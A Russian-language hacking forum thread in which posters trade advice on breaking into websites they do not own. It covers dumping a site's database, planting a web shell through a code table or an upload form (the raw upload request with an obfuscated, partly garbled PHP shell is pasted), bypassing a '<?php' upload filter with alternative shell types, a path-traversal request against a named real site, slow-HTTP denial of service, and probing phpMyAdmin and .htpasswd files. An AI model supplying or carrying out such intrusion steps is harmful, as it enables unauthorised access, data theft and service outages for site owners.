Начал сливать всю базу, надеюсь дня за три получится. А пока найдена таблица, в которой хранится php-код. Страничка, на которой выхлоп этого кода тоже найдена. Сначала хотел перезаписать его шелом, но будет слишком палевно. Есть так же подозрение что эта страничка доступна на другом домене как /index.html Можно еще что-то предпринять для заливки шела? Вообще с этой таблицей по всему выходит что это второй сайт, рядом. И он доступен как по основному домену, так и по мойдомен.com/firma/index.html
А ваша инъекция позволит вам перезаписать этот скрипт? не думаю. Но если все же условия позволяют, то просто допишите в скрипт минишелл, будет беспалевно визуально, потом уберете. Ищите админку или показывайте сайт, другие помогут.
Нашёл сайт который позволяет заливать свое звуковое оповещение,я залил .php файл с таким названием shell.mp3.php . Удивительно,но он его принял . Токо не не знаю куда он делся. На этот случай включил Tamper Data во время заливки http://******.ru/user/upload_sound.php При открытии страницы браузер Mozilla FireFox выдаёт следущее : Code: [/B][/B][/B][/B][/B][/B][/B][/B][/B][/B] [B][B][B][B][B][B][B][B][B][B]Неверное перенаправление на странице Firefox определил, что сервер перенаправляет запрос на этот адрес таким образом, что он никогда не завершится. Эта проблема может возникать при отключении или запрещении принятия кук. Можно ли как-то это обойти . И даже если обойду как в шелл то попасть . Страница где я заливал шелл выглядел так : Code: http://www.*****.ru/index.php?page=6[code] Вот POST DATA : [code]-----------------------------2196926319672\r\nContent-Disposition: form-data; name="sound"\r\n\r\n0\r\n-----------------------------2196926319672\r\nContent-Disposition: form-data; name="sound"; filename="shell.mp3.php"\r\nContent-Type: application/octet-stream\r\n\r\n<?php $j___f='\r®ñâJôôÞîÉ!=Ì¿àéÍáªÚÒÖ)!RЯ¡h9pÛzR(Ó¼ÄÊ0ÓþÄà@e¹²ôülh^z/+wËbU¢Í¼5 Ê(dÃ𱺪4-×axFÕ³èRª$cúØa?DÃáòÈø:a°¥L®^¢£Ñë¡ïìtÂoóÒívBg õ9`vó£Æʧ·£x¿\\hÝ>3R½¿¡¹cøNs@Éplò)¿¤fæ"áÒ¸ÄuàÒ¡F+"»1»¾j0ÙÈ0T7bì¢Dä На это [ B ] [ /B ] [ CODE ] [ /CODE ] не обращайте внимание . Я хз что это,но я это нашёл . Code: var PMA_gotoWhitelist = new Array(); PMA_gotoWhitelist[0]="db_create.php"; PMA_gotoWhitelist[1]="db_datadict.php"; PMA_gotoWhitelist[2]="db_sql.php"; PMA_gotoWhitelist[3]="db_events.php"; PMA_gotoWhitelist[4]="db_export.php"; PMA_gotoWhitelist[5]="db_importdocsql.php"; PMA_gotoWhitelist[6]="db_qbe.php"; PMA_gotoWhitelist[7]="db_structure.php"; PMA_gotoWhitelist[8]="db_import.php"; PMA_gotoWhitelist[9]="db_operations.php"; PMA_gotoWhitelist[10]="db_printview.php"; PMA_gotoWhitelist[11]="db_search.php"; PMA_gotoWhitelist[12]="db_routines.php"; PMA_gotoWhitelist[13]="export.php"; PMA_gotoWhitelist[14]="import.php"; PMA_gotoWhitelist[15]="index.php"; PMA_gotoWhitelist[16]="pdf_pages.php"; PMA_gotoWhitelist[17]="pdf_schema.php"; PMA_gotoWhitelist[18]="querywindow.php"; PMA_gotoWhitelist[19]="server_binlog.php"; PMA_gotoWhitelist[20]="server_collations.php"; PMA_gotoWhitelist[21]="server_databases.php"; PMA_gotoWhitelist[22]="server_engines.php"; PMA_gotoWhitelist[23]="server_export.php"; PMA_gotoWhitelist[24]="server_import.php"; PMA_gotoWhitelist[25]="server_privileges.php"; PMA_gotoWhitelist[26]="server_sql.php"; PMA_gotoWhitelist[27]="server_status.php"; PMA_gotoWhitelist[28]="server_status_advisor.php"; PMA_gotoWhitelist[29]="server_status_monitor.php"; PMA_gotoWhitelist[30]="server_status_queries.php"; PMA_gotoWhitelist[31]="server_status_variables.php"; PMA_gotoWhitelist[32]="server_variables.php"; PMA_gotoWhitelist[33]="sql.php"; PMA_gotoWhitelist[34]="tbl_addfield.php"; PMA_gotoWhitelist[35]="tbl_change.php"; PMA_gotoWhitelist[36]="tbl_create.php"; PMA_gotoWhitelist[37]="tbl_import.php"; PMA_gotoWhitelist[38]="tbl_indexes.php"; PMA_gotoWhitelist[39]="tbl_move_copy.php"; PMA_gotoWhitelist[40]="tbl_printview.php"; PMA_gotoWhitelist[41]="tbl_sql.php"; PMA_gotoWhitelist[42]="tbl_export.php"; PMA_gotoWhitelist[43]="tbl_operations.php"; PMA_gotoWhitelist[44]="tbl_structure.php"; PMA_gotoWhitelist[45]="tbl_relation.php"; PMA_gotoWhitelist[46]="tbl_replace.php"; PMA_gotoWhitelist[47]="tbl_row_action.php"; PMA_gotoWhitelist[48]="tbl_select.php"; PMA_gotoWhitelist[49]="tbl_zoom_select.php"; PMA_gotoWhitelist[50]="transformation_overview.php"; PMA_gotoWhitelist[51]="transformation_wrapper.php"; PMA_gotoWhitelist[52]="user_password.php";
Данный скрипт находится в cs2 => cs_user_sites А вот SCHEMA_PRIVILEGES Code: GRANTEE IS_GRANTABLE TABLE_SCHEMA TABLE_CATALOG PRIVILEGE_TYPE 'csuser'@'localhost' NO cs2 NULL SELECT 'csuser'@'localhost' NO cs2 NULL INSERT 'csuser'@'localhost' NO cs2 NULL UPDATE 'csuser'@'localhost' NO cs2 NULL DELETE 'csuser'@'localhost' NO cs2 NULL CREATE 'csuser'@'localhost' NO cs2 NULL DROP 'csuser'@'localhost' NO cs2 NULL INDEX 'csuser'@'localhost' NO cs2 NULL ALTER 'csuser'@'localhost' NO cs2 NULL CREATE TEMPORARY TA… 'csuser'@'localhost' NO cs2 NULL EXECUTE 'csuser'@'localhost' NO cs2 NULL CREATE VIEW 'csuser'@'localhost' NO cs2 NULL SHOW VIEW 'csuser'@'localhost' NO cs2 NULL CREATE ROUTINE 'csuser'@'localhost' NO cs2 NULL ALTER ROUTINE 'csuser'@'localhost' NO cs2 NULL EVENT 'csuser'@'localhost' NO cs2 NULL TRIGGER По всему выходит что могу. Пока не пробовал, усиленно курю маны по пхп и sql =)
Прошу помощи. Есть доступ к админке и базе данных.Пытаюсь залить шелл через загрузку картинок.Обычная картинка загружается без проблем и через tamper data расширение без проблем меняется на php. Если в картинку вставить php код то ничего не загружается.Фильтрует где то php код <?php. И записывает лог в базу данных.Пробовал <?= все равно не загружает.Помогите советом как обойти фильтр куда копать и что делать. Шелл обфусцирован но вначале стоит <?php из за этого и не пропускает.Помогите советом
Так в том и дело если картинка то заливается как php а если вставишь код шелла в картинку то не заливается ни как у него в скрипте заливки картинок стоит вот это if (false != imagecreatefromstring($img) && stripos($img, '<?php') === false Как это обойти?
Пробуй shtml шелл, asp мб. А есил в картинку в середину просто <?php добавить, все равно ругаться будет? Если просто phpinfo(); , то не ругается?
На сайте могу выполнять команды типа SELECT @@VERSION . Где можно найти подобные команды ? Или предоставьте сюда список пожалуйста .
Вечер добрый Почему тут не могу прочитать index http://pbskids.org/wilsonandditch/games/?game=../index точнее там хрень сказочная
Извиняюсь за тупой вопрос но - может ли сайт (лечь) из за сканера Acunetix? Заметил одну штуку интересную, есть несколько не больших ресурсов на 5-10 страниц, не более. Пускаю скан и о чудо через несколько минут сайт становится недоступным, при чем варианты типа "хостинг кончился" и "сайт отключили" не подходят 100% один из сайтов крутился через Google AdWords а это денег стоит, отключать его не стали бы (знаю хозяев) а при исчерпании средств на хостинге грузится должна соответствующая страница об отключении сайта, а результат который я наблюдал - это просто недоступный сайт "не удалось загрузить страницу" причем при попытке зайти на сайт с другой машины то же самое вижу =) Вот мне оочень интересно - такое вообще возможно?
Интересно с чем это связано? Со скоростью запросов к серверу или просто в методах проверки, я так понимаю он "методом тыка" проверяет? И еще интересует атака под названием "Slow HTTP DOS". Акунетикс показывает наличие такой уязвимости, хотелось бы инфы хоть какой то, поиск ничего толкового не дал, а на забугорных ресурсах как то совсем заумно, общие черты понял а вот как это дело осуществить так и не понял, есть ли софт какой под окна? Направьте на путь истинный =)) с инфой пожалста =)
это своего рода Дос атака . Связана с тем что паук крауль, то что делает карту сети, ходит по сайту, запрашивает страницу. идёт нагрузка на слабенткий хост
Доброго времени суток! Есть цель, которая не дает спокойно уснуть)). Поэтому куча вопросов (извиняйте, если сумбурно): 1. Удалось вытащить phpinfo.php, согласно которому установлено: операционка - LinuxRedhat, сервер - Apache/2.2.3 (CentOS), PHP Version 5.3.6, phpMyAdmin 2.11.11.3, mysql 5.1.58. Собственно вопрос, что означает последний адрес: HTTP_X_FORWARDED_FOR- 95.141.31.xxx, HTTP_X_REAL_IP - 95.141.31.xxx, REMOTE_ADDR - 95.141.31.xxx, SERVER_ADDR - 62.76.47.XXX? Виртуалка? 2. H**p://цель/myadmin/scripts/setup.php запускается, но не активны save/load. H**p://цель/myadmin/config.inc.php - пустой. H**p://цель/myadmin/libraries/config.default.php - пустой. Означает ли это, что ../config/ не создан и эта админка вообще не используется? Но ведь h**p://цель/myadmin/index.php- таки запрашивает авторизацию, как и H**p://цель/myadmin/scripts/signon.php... 3. Может ли быть такое, что админки вообще нет (не сконфигурирована), а сайт заливается по ftp? Или искать другую админку (пока методом тыка нашел закрытые папки h**p://цель/code/, h**p://цель/cgi-bin/, с авторизацией h**p://цель/ webmail/src/login.php/, открытую h**p://цель/icons/). 4. В корне находятся (forbidden) /.htaccess, /.htpasswd, /.htconfig - может, вся соль там?)) Куды копать дальше? Заранее спасибо!
через phpmyadmin 2.11 версии шелл не залить. Если там стоит что-то типа " Can not load or save configuration Please create web server writable folder config in phpMyAdmin toplevel directory as described in documentation. Otherwise you will be only able to download or display it" То значит майадмин ставили не через браузер и прав нет на создание и запись файлов. Ищи другие методы.
Спасибо, именно такая загогулина и присутствует, к сожалению. А другой админки не может быть (а эта-типа заманухи)? И другие вопросы тоже актуальны))